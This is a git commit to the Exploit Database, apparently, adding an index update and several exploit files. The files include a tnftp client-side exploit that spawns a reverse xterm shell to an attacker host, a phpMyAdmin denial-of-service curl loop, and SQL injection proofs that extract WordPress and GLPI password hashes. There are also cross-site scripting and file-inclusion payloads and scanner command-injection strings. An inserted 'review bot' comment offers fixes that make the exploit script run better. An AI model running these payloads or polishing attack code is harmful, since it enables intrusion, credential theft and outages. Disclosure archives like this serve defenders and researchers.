Updated 12_16_2014

Offensive Security 2014-12-16 04:49:38 +00:00
parent 8da471b3fa
commit b4ae4f9045
21 changed files with 1587 additions and 1 deletions


@ -31292,7 +31292,7 @@ id,file,description,date,author,platform,type,port
34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
@ -31912,6 +31912,7 @@ id,file,description,date,author,platform,type,port
35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0
35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@ -31980,6 +31981,7 @@ id,file,description,date,author,platform,type,port
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0
35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0
35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
@ -31992,3 +31994,21 @@ id,file,description,date,author,platform,type,port
35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0
35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80
35520,platforms/php/webapps/35520.txt,"Claroline 1.10 Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0
35521,platforms/php/webapps/35521.txt,"osCSS 2.1 Cross Site Scripting and Multiple Local File Include Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0
35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x 'cms_username' Cross Site Scripting Vulnerability",2011-03-29,"High-Tech Bridge SA",php,webapps,0
35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross Site Scripting Vulnerability",2011-03-29,"Mesut Timur",php,webapps,0
35524,platforms/php/webapps/35524.txt,"XOOPS 'view_photos.php' Cross Site Scripting Vulnerability",2011-03-29,KedAns-Dz,php,webapps,0
35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 'lng' Parameter Multiple SQL Injection Vulnerabilities",2011-03-30,"kurdish hackers team",php,webapps,0
35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCms Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0
35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0
35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0
35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0
35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javier Nieto",php,dos,0
35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0


148
platforms/bsd/remote/35427.py Executable file

@ -0,0 +1,148 @@
#!/usr/bin/env python2
#
# Exploit Title: [tnftp BSD exploit]
# Date: [11/29/2014]
# Exploit Author: [dash]
# Vendor Homepage: [www.freebsd.org]
# Version: [FreeBSD 8/9/10]
# Tested on: [FreeBSD 9.3]
# CVE : [CVE-2014-8517]
# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
#
# 29 Nov 2014 by dash@hack4.org
#
# usage:
#
# redirect the vulnerable ftp client requests for http to your machine
#
# client will do something like:
# ftp http://ftp.freebsd.org/data.txt
#
# you will intercept the dns request and redirect victim to your fake webserver ip
#
# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1
# probably do also xhost+victimip
#
# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
#
# sadly you cannot put a slash behind the | also www-encoded is not working
# plus problems with extra pipes
# this renders a lot of usefull commands useless
# so xterm -display it was ;)
#
# *dirty* *dirdy* *dyrdy* *shell* !
#
import os
import sys
import time
import socket
def usage():
print "CVE-2014-8517 tnftp exploit"
print "by dash@hack4.org in 29 Nov 2014"
print
print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])
#bind a fake webserver on 0.0.0.0 port 80
def webserveRedirect(redirect):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0",80))
s.listen(3)
h, c = s.accept()
#wait for request
#print h.recv(1024)
#send 302
print "[+] Sending redirect :>"
h.send(redirect)
s.close()
return 0
#bind a fake webserver on port %rport
def deliverUgga(owned):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0",rport))
s.listen(3)
h, c = s.accept()
# print h.recv(1024)
print "[+] Deliver some content (shell is spwaned now)"
h.send(owned)
s.close()
return 0
owned="""HTTP/1.1 200 Found
Date: Fri, 29 Nov 2014 1:00:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5
Connection: close
Content-Type: text/html; charset=iso-8859-1
ugga ugga
"""
if(os.getuid())!=0:
print "[-] Sorry, you need root to bind port 80!"
sys.exit(1)
if len(sys.argv)<3:
usage()
sys.exit(1)
rip = sys.argv[1]
rport = int(sys.argv[2])
revip = sys.argv[3]
print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
print "[+] Dont forget to run Xnest -ac :1"
# ok, lets use xterm -display
cmd = "xterm -display %s:1" % (revip)
cmd = cmd.replace(" ","%20")
print "[+] Payload: [%s]" % cmd
redirect = "HTTP/1.1 302\r\n"\
"Content-Type: text/html\r\n"\
"Connection: keep-alive\r\n"\
"Location: http://%s:%d/cgi-bin/|%s\r\n"\
"\r\n\r\n" % (rip,rport,cmd)
#child process owned data delivery
uggapid = os.fork()
if uggapid == 0:
uggapid = os.getpid()
deliverUgga(owned)
else:
#child proces for webserver redirect
webpid = os.fork()
if webpid == 0:
webpid = os.getpid()
webserveRedirect(redirect)
#childs, come home!
try:
os.waitpid(webpid,0)
except:
pass
try:
os.waitpid(uggapid,0)
except:
pass
#oh wait :>
time.sleep(5)
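Review bot: Both forked children fall through into the parent's wait block because neither branch exits after its server call: in the `if uggapid == 0:` branch `webpid` is never bound, so `os.waitpid(webpid,0)` raises NameError, and only the bare `except: pass` handlers below hide that (and the OSError the other child hits when it waits on a process that is not its child). Add `sys.exit(0)` directly after `deliverUgga(owned)` and after `webserveRedirect(redirect)` so each child terminates once its socket work is done, and narrow the two handlers to `except OSError: pass` so genuine mistakes are no longer swallowed. The header comment should also state that the script is Python 2 only (print statements, `#!/usr/bin/env python2`), since the file name carries no hint.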

42
platforms/php/dos/35539.txt Executable file

@ -0,0 +1,42 @@
=============
DESCRIPTION:
=============
A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to
cause a denial of service (resource consumption) via a long password.
CVE-2014-9218 was assigned
=============
Time Line:
=============
December 3, 2014 - A phpMyAdmin update and the security advisory is
published.
=============
Proof of Concept:
=============
*1 - Create the payload.*
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
{1..1000000} >> payload
*2 - Performing the Denial of Service attack.*
$ for i in `seq 1 150`; do (curl --data @payload
http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
=============
Authors:
=============
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
=============
References:
====================================================================
*
http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php

35
platforms/php/webapps/35505.txt Executable file

@ -0,0 +1,35 @@
# Exploit Title: WP Symposium 14.10 SQL Injection
# Date: 22-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip
# Category: webapps
# CVE: CVE-2014-8810
1. Description
$_POST['tray'] is not escaped.
File: wp-symposium\ajax\mail_functions.php
$tray = $_POST['tray'];
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");
http://security.szurek.pl/wp-symposium-1410-multiple-xss-and-sql-injection.html
2. Proof of Concept
Message ID must be one of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread")
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
<input type="hidden" name="action" value="getMailMessage">
Message ID: <input type="text" name="mid"><br />
SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- ">
<input type="submit" value="Inject">
</form>
Returned value will be between "[split]YOUR_RETURNED_VALUE[split]"
3. Solution:
Update to version 14.11
http://www.wpsymposium.com/2014/11/release-information-for-v14-11/
https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip
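Review bot: The Solution section tells readers to update to WP Symposium 14.11, but the index added by this same commit lists entry 35543, "Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit", so 14.11 is not a safe stopping point. A qualifying sentence such as `Note: 14.11 addresses this injection but is itself affected by a separate unauthenticated upload issue (EDB-ID 35543); update to the latest available release.` would keep defenders from treating 14.11 as fully remediated.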


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47073/info
Claroline is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Claroline 1.10 is vulnerable; other versions may also be affected.
"><script>alert(0)</script>

19
platforms/php/webapps/35521.txt Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/47074/info
osCSS is prone to a cross-site scripting vulnerability and multiple local file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process.
osCSS 2.1.0 RC12 is vulnerable; other versions may also be affected.
Cross-site scripting:
http://www.example.com/oscss2/admin108/editeur/tiny_mce/plugins/tinybrowser/upload.php?feid=%22);alert(0);//
Local file include:
http://www.example.com/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
http://www.example.com/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

10
platforms/php/webapps/35522.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/47077/info
Spitfire is prone to a cross-site scripting vulnerability. because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
[code]
GET / HTTP/1.1
Cookie: cms_username=admin">[xss]<
[/code]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47078/info
Tracks is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Tracks 1.7.2 is vulnerable; other versions may also be affected.
http://example.com/todos/tag/&#039;"--></style></script><script>alert(0x000238)</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47085/info
XOOPS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/modules/jobs/view_photos.php?lid=-9999&uid="><script>alert(document.cookie);</script>

11
platforms/php/webapps/35525.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/47086/info
GuppY is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
GuppY 4.6.14 is vulnerable; other versions may also be affected.
http://www.example.com/links.php?lng=fr [sql Injection]
http://www.example.com/guestbk.php?lng=fr [sql Injection]
http://www.example.com/articles.php?pg=43&lng=fr [ sql Injection]

96
platforms/php/webapps/35526.txt Executable file

@ -0,0 +1,96 @@
source: http://www.securityfocus.com/bid/47089/info
YaCOMAS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
YaCOMAS 0.3.6 is vulnerable; other versions may also be affected.
===================================================================
YaCOMAS 0.3.6 Multiple vulnerability
===================================================================
Software: Yacomas 0.3.6
Vendor: http://yacomas.sourceforge.net/
Vuln Type: Multiple Vulnerability
Download link: http://patux.net/downloads/yacomas-0.3.6_alpha.tar.gz
Author: Pr@fesOr X
contact: profesor_x(at)otmail.com
Home: www.ccat.edu.mx
Company: Centro de Investigaciones en Alta Tecnologia
=========================
--Description XSS --
=========================
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
===============================
--= Attack details No. 1 =--
===============================
This vulnerability affects /yacomas/asistente/index.php.
http://www.site.com/yacomas/asistente/index.php?opc=1
--URL encoded POST input S_apellidos was set to " onmouseover=prompt(11111111111) bad="
--The input is reflected inside a tag element between double quotes.
--details: can you inyect this in the HTTP headers whit this data:
-----------------------
C_sexo=M&I_b_day=0&I_b_month=0&I_b_year=0&I_id_estado=0&I_id_estudios=0&I_id_tasistente=0&S_apellidos=%22%20onmouseover%3dprompt%2811111111111%29%20bad%3d%22&S_ciudad=&S_login=oijclpgk&S_mail=hola@ccat.edu.mx.tst&S_nombrep=oijclpgk&S_org=&S_passwd=rodolfo&S_passwd2=rodolfo&submit=Registrarme
------------------------
===============================
--= Vulnerable forms and variables =--
===============================
S_apellidos
s_ciudad
s_login
s_mail
s_nombrep
s_org
===============================
--= Attack XSS details No. 2 =--
===============================
http://www.site.com/yacomas/admin/index.php
--details: can you inyect this in the HTTP headers whit this data in the Content-Length: header
------------------------------------------
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
-------------------------------------------------------------------
==========================================
--= Attack XSS remote code execution No. 2 =--
==========================================
http://www.site.com/yacomas/admin/index.php
--details: can you inyect this in the HTTP headers whit this data in the Content-Length: header
------------------------------------------
S_login=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&S_passwd=%27%22%3E%3E%3Cmarquee%3Ehacked+by+profesorx%3C%2Fmarquee%3E&submit=Iniciar
-------------------------------------------------------------------

40
platforms/php/webapps/35528.txt Executable file

@ -0,0 +1,40 @@
# Exploit Title: GLPI 0.85 Blind SQL Injection
# Date: 28-11-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://forge.indepnet.net/attachments/download/1899/glpi-0.85.tar.gz
# CVE: CVE-2014-9258
# Category: webapps
1. Description
$_GET['condition'] is not escaped correctly.
File: ajax\getDropdownValue.php
if (isset($_GET['condition']) && !empty($_GET['condition'])) {
$_GET['condition'] = rawurldecode(stripslashes($_GET['condition']));
}
if (isset($_GET['condition']) && ($_GET['condition'] != '')) {
$where .= " AND ".$_GET['condition']." ";
}
$query = "SELECT `$table`.* $addselect
FROM `$table`
$addjoin
$where
ORDER BY $add_order `$table`.`completename`
$LIMIT";
if ($result = $DB->query($query)) {
}
http://security.szurek.pl/glpi-085-blind-sql-injection.html
2. Proof of Concept
http://glpi-url/ajax/getDropdownValue.php?itemtype=group&condition=1 AND id = (SELECT IF(substr(password,1,1) = CHAR(36), SLEEP(5), 0) FROM `glpi_users` WHERE ID = 2)
3. Solution:
Update to version 0.85.1
http://www.glpi-project.org/spip.php?page=annonce&id_breve=334&lang=en
https://forge.indepnet.net/attachments/download/1928/glpi-0.85.1.tar.gz

655
platforms/php/webapps/35541.txt Executable file

@ -0,0 +1,655 @@
?Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
Injection Vulnerabilities
Author: Adler Freiheit
Discovered: 11 June 2014
Updated: 11 December 2014
Published: 11 December 2014
Vendor: Montala Limited
Vendor url: www.resourcespace.org
Software: ResourceSpace Digital Asset Management Software
Versions: 6.4.5976 and prior
Status: Unpatched
Vulnerable scripts:
/pages/themes.php
/pages/preview.php
/pages/help.php
/pages/search.php
/pages/user_password.php
/pages/user_request.php
(and probably others)
Description:
ResourceSpace is vulnerable to Cross-Site Scripting, and HTML and SQL
injection attacks, and insecure cookie handling. The scripts fail to
properly sanitize user-supplied input, check the network protocol used
to access the site.
Vulnerability: SC­1414
Name: Cross Site Scripting (XSS)
Type: Application
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 6 Oct 2014
Service: tcp/https:443
Severity: 4
Risk: 40
CVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )
Resolution Effort: 3
Description:
This web application is vulnerable to Cross Site Scripting (XSS).
XSS is caused when an application echoes user controllable input data
back to the browser without first sanitising or escaping dangerous
characters. Unescaped strings are then interpreted or executed by the
browser as script, just as if they had originated from the web server.
Malicious script is sent by the attacker via the vulnerable web
application and executed on the victims browser, within the context of
that user and may be used to steal session information, redirect users
to a malicious site, and even steal credentials in a Phishing attack.
Ref: http://www.owasp.org/index.php/Cross_Site_Scripting
http://cwe.mitre.org/data/definitions/79.html
Solution:
Validate all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) against expected Type,
Length and where possible, Format and Range characteristics. Reject
any data that fails validation.
Sanitise all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) by converting potentially
dangerous characters (listed below) into HTML entities such as > < etc
using output encoding.
By combining proper input validation with effective input sanitisation
and output encoding, Cross Site Scripting vulnerabilities will be
mitigated.
[1] <> (triangular parenthesis)
[2] " (quotation mark)
[3] ' (single apostrophe)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parenthesis)
[7] & (ampersand sign)
[8] + (plus sign)
[9] / (forward slash)
[10] | (pipe)
[11] [] (square brackets)
[12] : (colon)
Information
URI: /pages/preview.php
Parameter: sort (GET)
Other Info: "><SCRIPT>alert('SureApp XSS');</SCRIPT>
Vulnerability: 44967
Name: CGI Generic Command Execution (time­based)
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5
Description:
The remote web server hosts CGI scripts that fail to adequately
sanitize request strings. By leveraging this issue, an attacker may be
able to execute arbitrary commands on the remote host.
Note that this script uses a time­based detection method which is less
reliable than the basic method.
Solution:
Restrict access to the vulnerable application. Contact the
vendor for a patch or upgrade.
Information:
Using the GET HTTP method, Nessus found that:
+ The following resources may be vulnerable to arbitrary command
execution (time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%26%20ping%20­n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20­n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20ping%20­n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=%7C%20ping%20­n%203%20127.0.0.1%20%7C
References:
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 74
CWE: 77
CWE: 78
-----------------------------------------------------------------------------------------------------
Vulnerability: 43160
Name: CGI Generic SQL Injection (blind, time based)
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5
Description
By sending specially crafted parameters to one or more CGI scripts
hosted on the remote web server, Nessus was able to get a slower
response, which suggests that it may have been able to modify the
behavior of the application and directly access the underlying
database.
An attacker may be able to exploit this issue to bypass
authentication, read confidential data, modify the remote database, or
even take control of the remote operating system.
Note that this script is experimental and may be prone to false positives.
Solution:
Modify the affected CGI scripts so that they properly escape arguments.
Information:
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to blind SQL injection
(time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20­­%20
/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
References
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 751
CWE: 77
CWE: 801
CWE: 810
CWE: 89
---------------------------------------------------------------------------------------------------------------
Vulnerability: 55903
Name: CGI Generic XSS (extended patterns)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 4.3
Description
The remote web server hosts one or more CGI scripts that fail to
adequately sanitize request strings with malicious JavaScript. By
leveraging this issue, an attacker may be able to cause arbitrary HTML
and script code to be executed in a user's browser within the security
context of the affected site. These XSS vulnerabilities are likely to
be 'non­persistent' or 'reflected'.
Solution
Restrict access to the vulnerable application. Contact the vendor for
a patch or upgrade.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cross­site scripting+
The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);
­­­­­­­­ output ­­­­­­­­
(extended patterns) :
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&sort=504%20onerror="alert(504);
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=504%20onerror="alert(504);
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
ew</a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?order_by=&order_by=504%20onerror="alert(504);
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=DESC&archive=&k=">< Back to resource vi
ew</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);&search=&order_by=&fro
m=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_b
y=&from=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=504 onerror="alert(504);&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=504%20onerror="alert(504);&fro
